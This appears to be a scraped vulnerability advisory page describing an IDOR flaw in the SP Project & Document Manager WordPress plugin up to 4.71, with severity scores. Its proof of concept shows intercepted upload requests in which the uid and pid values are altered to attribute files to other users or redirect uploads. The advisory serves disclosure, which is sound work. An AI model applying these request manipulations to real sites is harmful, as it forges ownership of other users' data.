Lucene search

K
wpvulndbFewwordsWPVDB-ID:01427CFB-5C51-4524-9B9D-E09A603BC34C
HistoryApr 24, 2024 - 12:00 a.m.

SP Project & Document Manager <= 4.71 - Data Update via IDOR

2024-04-2400:00:00
fewwords
wpscan.com
4
sp project & document manager
data update
idor
validation
user id
file upload
poc
security vulnerability

6.4 Medium

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

9.2%

Description The plugin is missing validation in its upload function, allowing a user to manipulate the user_id to make it appear that a file was uploaded by another user

PoC

1. Select to upload a file through the plugin 2. Intercept the request: Example: \------WebKitFormBoundaryX4YnPgSA4oPHlNjv Content-Disposition: form-data; name="file[]"; filename="IMG_0628.PNG" Content-Type: image/png ... \------WebKitFormBoundaryX4YnPgSA4oPHlNjv Content-Disposition: form-data; name="action" sp_file_upload_callback \------WebKitFormBoundaryX4YnPgSA4oPHlNjv Content-Disposition: form-data; name="uid" 2(CHANGE HERE) \------WebKitFormBoundaryX4YnPgSA4oPHlNjv Modify the 2(CHANGE HERE) value and send the request. Modify the next request body changing 2(CHANGE HERE) to any user ID: pid=2&amp;action;=sp_cdm_link_save_embed&amp;uid;=2(CHANGE HERE)&amp;link-name;=link1&amp;link-url;=http%3A%2F%2Flocalhost%3A8020%2Flink1&amp;dlg-upload-notes;=aaa Note: the upload directory can also be manipulated by changing the pid

6.4 Medium

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

9.2%

Related for WPVDB-ID:01427CFB-5C51-4524-9B9D-E09A603BC34C